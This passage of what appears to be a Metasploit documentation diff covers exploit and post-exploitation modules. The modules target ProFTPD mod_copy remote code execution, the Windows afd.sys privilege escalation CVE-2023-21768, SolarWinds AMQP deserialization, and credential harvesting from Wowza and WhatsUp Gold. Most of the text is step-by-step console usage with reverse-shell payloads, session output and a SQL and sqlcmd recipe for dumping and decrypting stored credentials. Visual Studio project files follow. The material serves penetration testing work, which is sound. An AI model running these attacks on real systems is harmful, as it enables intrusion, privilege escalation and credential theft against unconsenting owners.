+[*] Sending payload to 127.0.0.1 (Wget/1.16 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 127.0.0.1
+[+] Deleted ZxGTSVGsOUZs.phtml
+[*] Meterpreter session 3 opened (127.0.0.1:4444 -> 127.0.0.1:43076) at 2023-01-19 19:16:07 +0000
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : sugarcrm
+OS           : Debian 8.6 (Linux 2.6.32)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > exit
+```
+
+## Limitations
+No `check` method.
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5.
+Any unauthenticated client can leverage these commands to copy files from any
+part of the filesystem to a chosen destination. The copy commands are executed with
+the rights of the ProFTPD service, which by default runs under the privileges of the
+'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
+directory, PHP remote code execution is made possible.
+
+
+## Installation Steps
+
+Download and build:
+
+```sh
+sudo apt install gcc make
+wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5.tar.gz
+tar zxvf proftpd-1.3.5.tar.gz
+cd proftpd-1.3.5
+./configure --with-modules=mod_copy
+make
+```
+
+Run ProFTPD using the sample default configuration file (in foreground with `-n` flag for testing):
+
+```
+sudo ./proftpd -n -c "`pwd`/sample-configurations/basic.conf"
+```
+
+Set up a web server with a world-writable directory:
+
+```
+sudo apt install php apache2
+sudo mkdir /home/var/www/html/test
+sudo chmod 777 /var/www/html/test
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/unix/ftp/proftpd_modcopy_exec`
+1. Do: `set rhosts <rhosts>`
+1. Do: `set rport_ftp <remote ftp port>`
+1. Do: `set tmppath <writable temporary file path>`
+1. Do: `set sitepath <writable web server file path>`
+1. Do: `run`
+1. You should get a new session.
+
+## Options
+
+### RPORT_FTP
+
+FTP port (default: `21`)
+
+### TMPPATH
+
+Absolute writable path (default: `/tmp`)
+
+### SITEPATH
+
+Absolute writable website path (default: `/var/www`)
+
+
+## Scenarios
+
+### ProFTPD 1.3.5 on Ubuntu 22.04
+
+```
+msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.200.158
+rhosts => 192.168.200.158
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > check
+[*] 192.168.200.158:80 - The target appears to be vulnerable. 192.168.200.158:21 - Unauthenticated SITE CPFR command was successful
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html/test
+sitepath => /var/www/html/test
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set targeturi /test
+targeturi => /test
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
+payload => cmd/unix/reverse_perl
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] 192.168.200.158:80 - 192.168.200.158:21 - Connected to FTP server
+[*] 192.168.200.158:80 - 192.168.200.158:21 - Sending copy commands to FTP server
+[*] 192.168.200.158:80 - Executing PHP payload /test/EbzQzU.php
+[+] 192.168.200.158:80 - Deleted /var/www/html/test/EbzQzU.php
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.158:46352) at 2023-03-19 00:22:49 -0400
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+pwd
+/var/www/html/test
+```
@@ -0,0 +1,58 @@
+## Vulnerable Application
+
+A vulnerability exists in the Windows Ancillary Function Driver for Winsock
+(`afd.sys`) can be leveraged by an attacker to escalate privileges to those of
+NT AUTHORITY\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is
+possible to create an arbitrary kernel Write-Where primitive, which can be used
+to manipulate internal I/O ring structures and achieve local privilege
+escalation.
+
+This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in
+January 2023 updates).
+
+### Installation And Setup
+Windows 11 versions 22H2 (without the patch) are vulnerable out of the box.
+This exploit module has been tested on Windows 11 versions 22H2 build 22621.525
+and 22621.963.
+
+## Options
+No specific options to be set.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a Meterpreter session on a vulnerable host
+1. Do: `use windows/local/cve_2023_21768_afd_lpe`
+1. Set the `SESSION` and `PAYLOAD` options
+1. Do: `run`
+1. You should get a privileged session.
+
+## Scenarios
+
+### Windows 11 Version 22H2 Build 22621.963 x64
+```
+msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
+
+[*] Started reverse TCP handler on 192.168.100.9:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Windows Build Number = 22621.963
+[+] The target appears to be vulnerable.
+[*] Launching netsh to host the DLL...
+[+] Process 3748 launched.
+[*] Reflectively injecting the DLL into 3748...
+[*] Sending stage (200774 bytes) to 192.168.100.9
+[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+[*] Meterpreter session 11 opened (192.168.100.9:4444 -> 192.168.100.9:55346) at 2023-03-27 18:46:08 +0200
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN11PRO
+OS              : Windows 10 (10.0 Build 22621).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
+
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the
+AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted
+message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.
+
+## Verification Steps
+
+1. Install the application (tested SolarWindows Orion NPM versions 2020.2.5 and 2020.2.6)
+   1. After installation is complete, create an AMQP account so you know the credentials. The default account is `orion`.
+   2. Open a command prompt in `C:\Program Files (x86)\SolarWinds\Orion\RabbitMQ\sbin>`
+   3. Run: `.\rabbitmqctl.bat add_user "hax" "Password1!"`
+   4. Run: `.\rabbitmqctl.bat set_permissions hax .* .* .*`
+   5. Run: `.\rabbitmqctl.bat set_user_tags hax administrator`
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/solarwinds_amqp_deserialization`
+4. Set the `RHOSTS`, `USERNAME`, `PASSWORD`, `PAYLOAD` and payload related-options
+5. Do: `run`
+6. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64
+
+```
+msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
+[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
+RHOSTS => 192.168.159.17
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
+USERNAME => hax
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
+
+[*] Powershell command length: 4175
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] 192.168.159.17:5671 - Successfully connected to the remote server.
+[*] 192.168.159.17:5671 - Successfully opened a new channel.
+[*] 192.168.159.17:5671 - Successfully published the message to the channel.
+[*] Sending stage (186438 bytes) to 192.168.159.17
+[*] Sending stage (186438 bytes) to 192.168.159.17
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400
+
+meterpreter >
+```
@@ -0,0 +1,44 @@
+## Vulnerable Application
+
+This module collects Wowza Streaming Engine user credentials.
+
+
+## Installation Steps
+
+Download and install [Wowza Streaming Engine](https://portal.wowza.com/account/downloads).
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session
+1. Do: `use post/multi/gather/wowza_streaming_engine_creds`
+1. Do: `set SESSION <session id>`
+1. Do: `run`
+
+
+## Options
+
+
+## Scenarios
+
+### Wowza Streaming Engine Manager Version 4.8.20+1 (build 20220919162035) on Ubuntu 22.04
+
+```
+msf6 > use post/multi/gather/wowza_streaming_engine_creds 
+msf6 post(multi/gather/wowza_streaming_engine_creds) > set session 1
+session => 1
+msf6 post(multi/gather/wowza_streaming_engine_creds) > run
+
+[*] Parsing file /usr/local/WowzaStreamingEngine/conf/admin.password
+Wowza Streaming Engine Credentials
+==================================
+
+Username  Password                                                      Groups         Encoding
+--------  --------                                                      ------         --------
+guest     $2y$10$HbioW4tMn6aqtMjrXWxbp.sCCGkRL2bM2prNJG0elnLlcLnsV5XDK  basic          bcrypt
+user      $2y$10$PiMwykGY8H9ZX45AwjgAluCXHwvswpCFrIsHmCKqLtSJLITXagjwu  admin|advUser  bcrypt
+
+[+] Credentials stored in: /root/.msf4/loot/20230306035212_default_192.168.200.158_host.wowzastream_500725.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,305 @@
+## Vulnerable Application
+
+This module exports and decrypts credentials from WhatsUp Gold to a CSV file; it is intended as a
+post-exploitation module for Windows hosts with WhatsUp Gold installed. The module has been tested
+on and can successfully decrypt credentials from WhatsUp versions 11.0 to the latest (22.x).
+Extracted credentials are automatically added to loot.
+
+## Actions
+
+### Dump
+
+`dump` is the default action and performs extraction of the WhatsUp Gold database parameters and
+encryption keys. This action also exports WhatsUp Gold SQL data and immediately decrypts it. `dump`
+is suitable when the following conditions are met:
+
+1. The sqlcmd binary is available on the target system
+2. The machine account has access to the WhatsUp Gold database (if Windows Integrated) or WhatsUp
+   Gold is using SQL native auth
+
+### Export
+
+`export` performs SQL data extraction of the encrypted data as a CSV file; use this option if it is
+necessary to migrate the Meterpreter session to a new non-SYSTEM identity in order to access the SQL
+database. Invoking the `export` action requires the Meterpreter session to be running in the context
+of a user that has access to the configured WhatsUp Gold SQL database.
+
+### Decrypt
+
+`decrypt` performs decryption of encrypted WhatsUp Gold SQL data. To invoke the `decrypt` action, you
+must also set the `CSV_FILE` advanced option or the `MSSQL_INSTANCE` and `MSSQL_DB` options. See
+`SQL Data Acquisition` below for more information.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get session on host via method of choice and background it
+3. Do: `use post/windows/gather/credentials/whatsupgold_credential_dump`
+4. Do: `set session <session>`
+5. Do: `dump` to extract and decrypt the WhatsUp Gold database, or `export` to extract the encrypted database only
+
+If `dump` or `export` fail, the session identity may need permission to log in to SQL; see `Scenarios`.
+
+## Advanced Options
+
+### AES_SALT
+
+WhatsUp Gold modern (type 3) encryption generates an AES256 key based on SHA-256 hash of the
+product serial number as stored in the system registry. This option allows the operator to provide
+the WhatsUp serial number rather than attempt to extract it from the registry.
+
+### CSV_FILE
+
+Path to a CSV file that contains the encrypted WhatsUp Gold database data that has been previously
+exported. Provide this option when invoking offline decryption using the `decrypt` action.
+
+### MSSQL_DB
+
+The MSSQL database name used by WhatsUp Gold, specified in the `INITIAL CATALOG` as extracted
+from the database parameters. Provide this option when invoking the `export` action.
+
+### MSSQL_INSTANCE
+
+The path to the MSSQL instance used by WhatsUp Gold, specified in the `DATA SOURCE` as extracted
+from the database parameters. Provide this option when invoking the `export` action.
+
+## Scenarios
+
+### SQL Data Acquisition
+
+The sqlcmd binaries (part of the SQL Server Management Studio) must be installed on the system
+to access the database. WhatsUp Gold does not install SSMS or sqlcmd by default if it is not also
+installing a local SQL server instance - in such cases, it will be necessary to extract the
+encrypted database manually and provide the module with a path to the extracted data. To do so
+execute the SQL query below against the WhatsUp Gold database and save the resulting row set as a CSV file.
+
+The CSV header must match:
+
+`nCredentialTypeID,DisplayName,Description,Username,Password,Method`
+
+Columns are cast `VARBINARY` to deal with poor CSV export support in `sqlcmd`. Export the results of
+the query below to CSV file:
+
+```
+SET NOCOUNT ON;
+SELECT
+  ct.nCredentialTypeID nCredentialTypeID,
+  CONVERT(VARBINARY(1024),ct.sDisplayName) DisplayName,
+  CONVERT(VARBINARY(1024),ct.sDescription) Description,
+  CONVERT(VARBINARY(1024),ctd.sName) Username,
+  CONVERT(VARBINARY(4096),ctd.sValue) Password
+FROM
+  [dbo].[CredentialType] AS ct
+JOIN
+  [dbo].[CredentialTypeData] AS ctd ON(ct.nCredentialTypeID=ctd.nCredentialTypeID)
+WHERE
+  ctd.sValue IS NOT NULL AND ctd.sValue NOT LIKE ''
+```
+
+Output must be encoded VARBINARY per above, and must be well-formed CSV (i.e. no trailing whitespace).
+If using `sqlcmd`, ensure the `-W` and `-I` parameters are included to strip trailing whitespace and
+allow quoted identifiers. Suggested syntax for `sqlcmd` using Windows authentication is below, where
+the contents of `solarwinds_sql_query.sql` is the text of the SQL query above:
+
+`sqlcmd -d "<DBNAME>" -S <MSSQL_INSTANCE> -E -i sql_query.sql -o wug_dump.csv -h-1 -s"," -w 65535 -W -I`
+
+This should place a CSV export file suitable for use within the module at `wug_dump.csv`. If
+using SQL native auth, replace the `-E` parameter with
+
+`-U "<MSSQL_USER>" -P "<MSSQL_PASS>"`
+
+### Examples
+
+Windows Server 2019 host running WhatsUp Gold Build 22.1.39 with external database
+and SQL native authentication using the `dump` action:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/whatsupgold_credential_dump
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > dump
+
+[*] Hostname WUG IPv4 192.168.101.137
+[*] WhatsUp Gold Build 22.1.39
+[*] Init WhatsUp Gold crypto ...
+[+] WhatsUp Gold Serial Number: 52CXF233MXGRDVB
+[+] WhatsUp Gold Dynamic Encryption Salt
+[+]     HEX: E9143AD84940A233
+[+] WhatsUp Gold Composed AES256
+[+]     KEY: 5B83224E3BFB363C841C6E27B6DF6B824ECD67BA06B4ED1918C0F738A60A8A75
+[+]      IV: 5205DF3A92F346215308DD91DEAF69AE
+[*] Init WhatsUp Gold SQL ...
+[+] SolarWinds WhatsUp Gold SQL Database Connection Configuration:
+[+]     Instance Name: cornflakes.cesium137.io
+[+]     Database Name: WhatsUp
+[+]     Database User: WhatsUpGold_WUG
+[+]     Database Pass: KB4A5bERZ13o6GGF3kON3z6mx5
+[*] Performing export of WhatsUp Gold SQL database to CSV file
+[*] Export WhatsUp Gold DB ...
+[+] 11 WUG rows exported, 4 unique nCredentialTypeIDs
+[+] Encrypted WhatsUp Gold Database Dump: /root/.msf4/loot/20221218103644_default_192.168.101.137_whatsup_gold_enc_233587.txt
+[*] Performing decryption of WhatsUp Gold SQL database
+[+] 11 WUG rows loaded, 4 unique nCredentialTypeIDs
+[*] Process WhatsUp Gold DB ...
+[+] 11 WUG rows processed
+[*] 11 rows recovered: 7 plaintext, 4 decrypted (0 blank)
+[*] 11 rows written (0 blank rows withheld)
+[+] 4 unique WUG nCredentialTypeID records recovered
+[+] Recovered Credential: LDAP bind account
+[+]     L: CESIUM137\ldap
+[+]     P: WuddidUSay2Me?!
+[+] Recovered Credential: vSphere SSO Admin
+[+]     L: Administrator@vSphere.local
+[+]     P: IAmOut2Lunch!
+[+] Recovered Credential: NetScaler root
+[+]     L: nsroot
+[+]     P: quit2day!
+[+] Decrypted WhatsUp Gold Database Dump: /root/.msf4/loot/20221218103644_default_192.168.101.137_whatsup_gold_dec_398808.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > 
+```
+
+Windows Server 2019 with MSSQL SSPI authentication configured for SQL database -
+migrate the session PID to an identity with permission to log on to the SQL server
+before executing the `dump` action:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/whatsupgold_credential_dump
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > dump
+
+[*] Hostname WINNEBAGO IPv4 192.168.101.125
+[*] WhatsUp Gold Build 22.1.39
+[*] Init WhatsUp Gold crypto ...
+[+] WhatsUp Gold Serial Number: 52CXF233MXGRDVB
+[+] WhatsUp Gold Dynamic Encryption Salt
+[+]     HEX: E9143AD84940A233
+[+] WhatsUp Gold Composed AES256
+[+]     KEY: 5B83224E3BFB363C841C6E27B6DF6B824ECD67BA06B4ED1918C0F738A60A8A75
+[+]      IV: 5205DF3A92F346215308DD91DEAF69AE
+[*] Init WhatsUp Gold SQL ...
+[+] SolarWinds WhatsUp Gold SQL Database Connection Configuration:
+[+]     Instance Name: WINNEBAGO\WHATSUP
+[+]     Database Name: WhatsUp
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Performing export of WhatsUp Gold SQL database to CSV file
+[*] Export WhatsUp Gold DB ...
+[-] Post aborted due to failure: unknown: Sqlcmd: Error: Microsoft ODBC Driver 13 for SQL Server : Login failed for user 'CESIUM137\WINNEBAGO$'..
+Sqlcmd: Error: Microsoft ODBC Driver 13 for SQL Server : Cannot open database "WhatsUp" requested by the login. The login failed..
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > ps
+
+Process List
+============
+
+ PID   PPID  Name                          Arch  Session  User                             Path
+ ---   ----  ----                          ----  -------  ----                             ----
+ 0     0     [System Process]
+ 4     0     System                        x64   0
+ [...]
+ 7908  1216  cmd.exe                       x64   1        CESIUM137\teenysupguy            C:\Windows\System32\cmd.exe
+ [...]
+meterpreter > migrate 7908
+[*] Migrating from 2536 to 7908...
+[*] Migration completed successfully.
+meterpreter > bg
+[*] Backgrounding session 1...
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > dump
+
+[*] Hostname WINNEBAGO IPv4 192.168.101.125
+[*] WhatsUp Gold Build 22.1.39
+[*] Init WhatsUp Gold crypto ...
+[+] WhatsUp Gold Serial Number: 52CXF233MXGRDVB
+[+] WhatsUp Gold Dynamic Encryption Salt
+[+]     HEX: E9143AD84940A233
+[+] WhatsUp Gold Composed AES256
+[+]     KEY: 5B83224E3BFB363C841C6E27B6DF6B824ECD67BA06B4ED1918C0F738A60A8A75
+[+]      IV: 5205DF3A92F346215308DD91DEAF69AE
+[*] Init WhatsUp Gold SQL ...
+[+] SolarWinds WhatsUp Gold SQL Database Connection Configuration:
+[+]     Instance Name: WINNEBAGO\WHATSUP
+[+]     Database Name: WhatsUp
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Performing export of WhatsUp Gold SQL database to CSV file
+[*] Export WhatsUp Gold DB ...
+[+] 9 WUG rows exported, 4 unique nCredentialTypeIDs
+[+] Encrypted WhatsUp Gold Database Dump: /root/.msf4/loot/20221218104026_default_192.168.101.125_whatsup_gold_enc_241327.txt
+[*] Performing decryption of WhatsUp Gold SQL database
+[+] 9 WUG rows loaded, 4 unique nCredentialTypeIDs
+[*] Process WhatsUp Gold DB ...
+[+] 9 WUG rows processed
+[*] 9 rows recovered: 6 plaintext, 3 decrypted (0 blank)
+[*] 9 rows written (0 blank rows withheld)
+[+] 4 unique WUG nCredentialTypeID records recovered
+[+] Recovered Credential: ldap
+[+]     L: CESIUM137\ldap
+[+]     P: WuddidUSay2Me?!
+[+] Recovered Credential: vSphere SSO Admin
+[+]     L: Administrator@vSphere.local
+[+]     P: IAmOut2Lunch!
+[+] Recovered Credential: nsroot
+[+]     L: nsroot
+[+]     P: quit2day!
+[+] Decrypted WhatsUp Gold Database Dump: /root/.msf4/loot/20221218104026_default_192.168.101.125_whatsup_gold_dec_104164.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > 
+```
+
+Host running Windows Server 2003 R2 and WhatsUp Premium 11.0.1.11231 with MSDE;
+the operator must supply the export data via the `CSV_FILE` advanced option:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/whatsupgold_credential_dump
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > dump
+
+[*] Hostname WINCEMEAT IPv4 192.168.101.144
+[*] WhatsUp Gold Build 11.00.0004
+[*] Init WhatsUp Gold crypto ...
+[!] Could not extract dynamic encryption salt; type 3 ciphertext will not be decrypted
+[*] Init WhatsUp Gold SQL ...
+[+] WhatsUp Gold SQL Database Connection Configuration:
+[+]     Instance Name: WINTESSENCE\WHATSUP
+[+]     Database Name: WhatsUp
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[-] Post aborted due to failure: bad-config: Unable to identify sqlcmd SQL client on target host
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > 
+```
+
+The operator extracts the SQL data from the database into `/tmp/wug_dump.csv` out of band.
+
+```
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > set CSV_FILE /tmp/wug_dump.csv
+CSV_FILE => /tmp/wug_dump.csv
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > decrypt
+
+[*] Hostname WINCEMEAT IPv4 192.168.101.144
+[*] WhatsUp Gold Build 11.00.0004
+[*] Init WhatsUp Gold crypto ...
+[!] Could not extract dynamic encryption salt; type 3 ciphertext will not be decrypted
+[*] Performing decryption of WhatsUp Gold SQL database
+[+] 2 WUG rows loaded, 1 unique nCredentialTypeIDs
+[*] Process WhatsUp Gold DB ...
+[+] 2 WUG rows processed
+[*] 2 rows recovered: 1 plaintext, 1 decrypted (0 blank)
+[*] 2 rows written (0 blank rows withheld)
+[+] 1 unique WUG nCredentialTypeID records recovered
+[+] Recovered Credential: LDAP Bind
+[+]     L: CESIUM137\ldap
+[+]     P: WuddidUSay2Me?!
+[+] Decrypted WhatsUp Gold Database Dump: /root/.msf4/loot/20221219112059_default_192.168.101.144_whatsup_gold_dec_615423.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/whatsupgold_credential_dump) >
+```
@@ -0,0 +1,2 @@
+.vs/*
+*.vcxproj.filters
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.32407.337
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-21768", "CVE-2023-21768.vcxproj", "{24AFFB38-5B93-4D0E-8329-D3B27B337D25}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{24AFFB38-5B93-4D0E-8329-D3B27B337D25}.Debug|x64.ActiveCfg = Debug|x64
+		{24AFFB38-5B93-4D0E-8329-D3B27B337D25}.Debug|x64.Build.0 = Debug|x64
+		{24AFFB38-5B93-4D0E-8329-D3B27B337D25}.Debug|x86.ActiveCfg = Debug|Win32
+		{24AFFB38-5B93-4D0E-8329-D3B27B337D25}.Debug|x86.Build.0 = Debug|Win32
+		{24AFFB38-5B93-4D0E-8329-D3B27B337D25}.Release|x64.ActiveCfg = Release|x64
+		{24AFFB38-5B93-4D0E-8329-D3B27B337D25}.Release|x64.Build.0 = Release|x64
+		{24AFFB38-5B93-4D0E-8329-D3B27B337D25}.Release|x86.ActiveCfg = Release|Win32
+		{24AFFB38-5B93-4D0E-8329-D3B27B337D25}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {ED684E2D-0A3F-471F-A3D4-3F508877D62C}
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,220 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{24affb38-5b93-4d0e-8329-d3b27b337d25}</ProjectGuid>
+    <RootNamespace>CVE202321768</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+    <OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+    <IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>true</GenerateManifest>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+    <IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+    <OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+    <IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>true</GenerateManifest>
+  </PropertyGroup>
